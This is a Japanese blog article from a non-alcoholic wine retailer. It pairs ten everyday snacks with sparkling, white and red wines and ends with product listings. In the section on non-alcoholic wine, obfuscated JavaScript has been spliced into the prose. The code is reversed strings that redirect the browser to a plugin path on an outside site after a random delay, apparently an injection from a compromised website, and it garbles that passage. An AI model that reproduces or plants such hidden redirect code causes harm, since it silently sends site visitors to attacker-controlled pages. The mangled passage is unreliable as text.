ノンアルコールワインを楽しむ皆様に。

   
2022/2/15 posted

予想外のマッチング!意外とイケるワインおつまみ10選

   

  楽しむ・学ぶ

 

ワインもノンアルコールワインも大好き。でも、自宅でちょっとワインを飲みたいと思った時に、生ハムやカマンベールチーズやオリーブなど、いわゆるワインに合うおつまみが手元になくて困った、という経験はありませんか?

もっと手軽に手に入る食べ物と上手にペアリングができれば、ワインの家飲みがもっと敷居の低いものになるはず。
そこで今回は、コンビニやスーバーで簡単に調達できるおつまみ類や、日頃からよく食べるお料理とワインの相性についてみてみました!

◇ポテトチップス&スパークリングワイン

フランスでは、夕食の前に軽いおつまみを食べながらお酒を飲む「アペロ」という習慣がありますが、アペロのおつまみとしてよく出てくるのが、ポテトチップスです。
ポテトチップスはサクサクとした食感が持ち味ですが、実はこれにぴったりなのがスパークリングワイン!
ポテチの塩味と香ばしい香り、そして、サクサクの歯ごたえに、スパークリングワインのはじける泡の組み合わせが軽快で、飲み進んでしまうこと間違いなしのコンビです。

◇枝豆&白ワイン

枝豆といえばビールの友というイメージですが、実はワインにもマッチするとご存じですか?
特に相性がいいのは、さっぱりとライトボディの辛口白ワイン。塩で味付けした枝豆と、ミネラル感のある辛口白ワインはピッタリの相性です。枝豆の持つ豊かな風味もしっかり感じられて、どこか和を感じる組み合わせになります。
洋風がお好きな方は、オリーブオイルでガーリックと赤唐辛子を炒めたペペロンチーノオイルで枝豆を和えた「ペペロン枝豆」にしても良いですよ。

◇フライドポテト&スパークリングワイン

さて、ポテチや枝豆よりももう少しお腹にたまるおつまみを…という方におすすめなのが、コンビニのホットスナックでもおなじみのフライドポテト。
カリッとクリスピーに揚がったフライドポテトの食感は、シュワシュワとはじける炭酸の舌触りにベストマッチ。お互いの美味しさを高め合います。また、油でべた付く口の中を、スパークリングワインの炭酸がさっぱりとさせてくれる効果も。
マリアージュの肝はフライドポテトのカリッとした食感なので、できるだけ揚げたてをワインと楽しむのがベストです。味付けはシンプルに塩がおすすめですよ。

◇唐揚げ&スパークリングワイン

ポテトだけではなく、実は揚げ物一般とスパークリングワインはとても相性の良い組み合わせです。
例えば、唐揚げ。カリカリと揚がった皮の食感はスパークリングワインにピッタリなだけではなく、噛みしめるとジュワッと出てくる肉汁の後口を、ワインの酸がさっぱりと洗い流してくれるので、無限に食べ続けられてしまいそうな組み合わせです。
唐揚げとワインの組み合わせをさらに美味しくするには、唐揚げにレモン汁をかけると良いでしょう。
スパークリングワインや白ワインの香りを例える時にレモンや柑橘の香りと表現することがありますが、レモンの香りが仲立って、唐揚げとワインの間を取り持ってくれます。

◇ポテトサラダ&白ワイン

卵黄と油、ビネガーで作ったマヨネーズ。酸味という共通点があるため、ワインと相性が良いのが特徴です。
なので、マヨネーズで野菜を和えたサラダなどのお料理は、ワインに合わせるおつまみとしてピッタリ。スーパーで買えるお惣菜の定番である、茹でたポテトと薄切りにした玉ねぎやハムをマヨネーズで和えたポテトサラダも、ワインに良く合うお手軽な一品です。
こってりとした口当たりのポテトサラダですが、白ワインの酸によりさっぱりと楽しめて、ワインが進む組み合わせです。

◇カシューナッツ & 白ワイン or 赤ワイン

バターを思わせる濃厚な風味のカシューナッツ。ワインのおつまみといえば、アーモンドやレーズンが定番ですが、樽熟成した白ワインの香りを表現する時にたとえられることもあるカシューナッツとの組み合わせもなかなかです。
特に、樽熟成シャルドネなどのリッチな白ワインやスパイシー感のある濃厚な赤ワインと、油分を多く含み濃厚な味わいのカシューナッツは抜群の相性を見せますので、まさかと思わず一度試してみてくださいね!
なお、ビールと合わせる時とは違い、ナッツ類をワインと合わせる時は、油や塩を使っていない素炒りのものを選んでくださいね。

◇レーズンチョコレート&赤ワイン

ワインはもともとブドウから作られているだけあってレーズンとは相性が良いですが、レーズンチョコレートはチョコのほろ苦さとレーズンの甘さが混じりあって、赤ワインの味わいをさらに引き立ててくれます。
チョコレートは味の強いお菓子なので、渋みの強い濃厚タイプの赤ワインと合わせると美味しいマリアージュが楽しめますよ。

◇カルパス&赤ワイン

ワインバーやビストロに行くと、前菜としてハムやソーセージの盛り合わせやパテが用意されていますよね。
近所のコンビニにはそんなオシャレな食材はないなあ…という時に、手軽にレストランの前菜気分が味わえるのが、おやつカルパス。
お父さんのお酒のおつまみや、こどものおやつのイメージのカルパスですが、もともとはロシア発祥のドライソーセージで、豚・肉・鶏などのひき肉に調味料と香辛料、ラードなどを加えて腸詰にして加熱したものを乾燥熟成させて作ったものです。サラミソーセージとも似ていますが、サラミより水分の含有量が多いため、ソフトで食べやすいのが特徴。なんといっても駄菓子コーナーやおつまみコーナーで手軽に安く手に入るのが良いですよね。

スパイスの効いたカルパスに合うのは、エレガントで高級な味わいのワインよりも、果実味が強くて濃厚・パワフルな味わいのフルボディの赤ワイン。値段も手ごろなカリフォルニアやチリワインならベストマッチです。

◇赤ワイン&焼き鳥

赤ワインとお醤油は、実はとても好相性。特に、焼き鳥の甘くて濃厚な醤油だれは、ミディアムボディのフルーティーな赤ワインにぴったりです。
また、赤ワインの渋みの元であるタンニンには、脂っこい料理を食べた時に口をさっぱりとしてくれる作用があります。
焼き鳥を食べて赤ワインを飲むと、タンニンが口腔内のたんぱく質と結合しますが、その際、たんぱく質に付着していた焼き鳥の脂の一部が取れるため、口の中がさっぱりした感じになるのです。
皮、ぼんじり、せせりなどの脂の多い部位を食べる時は、ぜひ赤ワインを合わせてみてくださいね。

また、赤ワインやロゼワインは中華系の脂っこくコッテリしたお惣菜とも好相性です。
中でも、甘酸っぱいあんを絡めた酢豚や甘酢団子とは絶妙の組み合わせ。
こちらも試してみてくださいね!

◇赤ワイン&粉もん

たこ焼き

もう一つ、赤ワインと相性が良いのがソース。ソースの材料にはお酢、玉ねぎ、ニンニクなどの香辛野菜やリンゴなどのフルーツ、そしてスパイスが使われていますが、酸味やスパイシー感という点が赤ワインと共通するため、これまた相性が良いのです。
そんなソースで食べるお好み焼き・たこ焼き・ねぎ焼きなどの粉もん類が、赤ワインに合わないわけがありません。
粉もんにぴったりなのは、ちょっとスパイス感のある赤ワイン。ワインのフルーティーな果実味と酸味、スパイスを思わせる香りが、ソースの甘くスパイシー感あふれる風味と相性抜群です。中に入った、豚肉・タコ・牛すじなどの具材の味わいも、ワインがしっかりと引き立ててくれますよ。

なお、タコ焼きをポン酢でいただく場合は、赤ワインでなく白ワインの方がバランスが取れます。ワインはややコクのある味わいのものを選ぶとよいでしょう。
お出汁でいただく明石焼きは、キレのよい辛口白ワインと組み合わせると、高級和食を思わせる味わいになりますよ。

◇ノンアルコールワインにぴったりのお手軽おつまみは?

さて、ではノンアルコールワインの場合は、どのようなおつまみが合うのでしょうか?

MELLOW stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toreで取扱中のネオブュル社のノンアルコールワインは、本物のワインを減圧蒸留法より蒸留し、ワイン本来が持つアロマ・フレーバーを守りつつアルコールのみを蒸発させて除去しています。
なのでワインらしい風味は抜群ですが、やはりアルコールが入らないぶん、通常のワインと比較するとマイルドで優しい味わいとなります。

そんなノンアルコールワインに合うのは、同じようにマイルドな味わいのおつまみや、やや甘い味付けのおつまみです。
ノンアルコールのスパークリングや白ワインには、クリームコロッケやクリームチーズを付けたクラッカー、マヨネーズで和えたポテトや卵のサラダなど、ノンアルコールの赤ワインには、ドライフルーツ、焼き鳥やレトルトパックの豚の角煮などを合わせてみてはいかがでしょうか?

皆さんも、スーパーやコンビニで簡単に手に入るスナックやおつまみと合わせて、気軽なおうちワインを楽しんでみてくださいね!

【こちらもご覧ください!MELLOW magazine過去記事】
・熱々で美味しい中華料理とワインのマリアージュ!中華料理とワインの合わせ方
・【関西人必見!】たこ焼きに合うワイン!たこ焼きとワインのマリアージュ
・意外な組み合わせが素敵なマリアージュ!?ワインと一緒に味わって欲しい料理5選

MELLOWは本格ワインのノンアルコールワインをオススメします!

デュク・ドゥ・モンターニュ ブリュット

デュク・ドゥ・モンターニュ ブリュット/750ml

メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
辛口でキレのある口あたり、まろやかな酸味。
アルコール度数 / 
0.0%

よりドライな口当たりのノンアルコール・スパークリングワインが欲しいという声に応える商品。青リンゴとレモンを思わせる爽やかな果実味に、まろやかな酸味。キリッとした口当たりに、爽やかなはじける炭酸。辛口タイプのノンアルコール・スパークリングワインです。

デュク・ドゥ・モンターニュ 製品

デュク・ドゥ・モンターニュ/750ml

カロリー / 
27kcal (100mlあたり)
メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
甘口
アルコール度数 / 
0.0%

ノンアルコールなのに、まるでシャンパンの味。本物のワインを醸造後、独自の脱アルコール製法で仕上げた本格的な味わいのノンアルコールスパークリングワイン。お酒が飲めない方や、妊娠・授乳中の方、ドライバーの方にも安心して楽しんでいただける商品です。

デュク・ドゥ・モンターニュ・ロゼ 製品

デュク・ドゥ・モンターニュ・ロゼ/750ml

カロリー / 
23kcal (100mlあたり)
メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
やや甘口
アルコール度数 / 
0.0%

本物のワインを醸造後、独自の脱アルコール製法で仕上げた本格的な味わいのノンアルコールスパークリングワイン。ロゼは、輝くようなサーモンピンクの愛らしい色合い。華やかなアロマの香りも豊かなエレガントな商品です。

ヴィンテンス・シャルドネ(白) 製品

ヴィンテンス・シャルドネ(白)/750ml

※ボトルデザインをリニューアルしました
カロリー / 
20kcal (100mlあたり)
メーカー / NEOBULLES(ネオブュル)社 ベルギー
味わい / 
やや辛口
アルコール度数 / 
0.0%

ブルゴーニュ地域を代表する品種のシャルドネを使用しています。ブドウの品種にこだわり醸造したワインからアルコール分だけを取り除いたノンアルコールスティルワイン。シトラスの香りと複雑味のある豊かな味わいをお楽しみいただけます。鶏肉などの白身肉や魚の料理と相性がよいタイプです。

ヴィンテンス・メルロー(赤) 製品

ヴィンテンス・メルロー(赤)/750ml

※ボトルデザインをリニューアルしました
カロリー / 
20kcal (100mlあたり)
メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
やや辛口
アルコール度数 / 
0.0%

ボルドー地域を代表する品種のメルローを使用しています。ブドウの品種にこだわり醸造したワインからアルコール分だけを取り除いたノンアルコールスティルワイン。フルーティーながらコクがあり、ブルーベリーの風味も感じられます。赤味の肉やチーズと好相性です。

Thanks for your reading!